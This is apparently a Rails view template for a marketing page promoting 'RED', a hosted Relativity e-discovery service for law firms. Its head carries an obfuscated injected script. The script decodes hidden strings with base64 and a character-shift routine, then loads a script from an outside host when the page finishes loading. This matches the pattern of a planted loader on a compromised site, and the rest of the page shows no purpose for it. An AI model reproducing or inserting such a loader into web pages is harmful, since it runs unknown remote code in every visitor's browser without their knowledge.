<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2 white">
  <section class="section">
    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content pb-0">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-8 col-xl-4">
                <%= image_tag 'newRedLogo.png', alt: 'Logo' %>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>Law firms and corporations are constantly searching for cutting edge technology with a limited budget. Many firms are forced to use internal tools that are often inadequate to meet their demands. That is why we created <strong>RED</strong>, bringing the added value of using Relativity in-house.</h6>
          <br>
          <p class="heading-5">With <strong>RED</strong>, you can use Relativity with:</p>
          <ul class="list-marked">
            <li><h6>No long term contract</h6></li>
            <li><h6>No minimum data requirements</h6></li>
            <li><h6>No Relativity license to buy</h6></li>
            <li><h6>No hardware to buy</h6></li>
            <li><h6>No IT burden</h6></li>
            <li><h6>No staff to hire</h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>

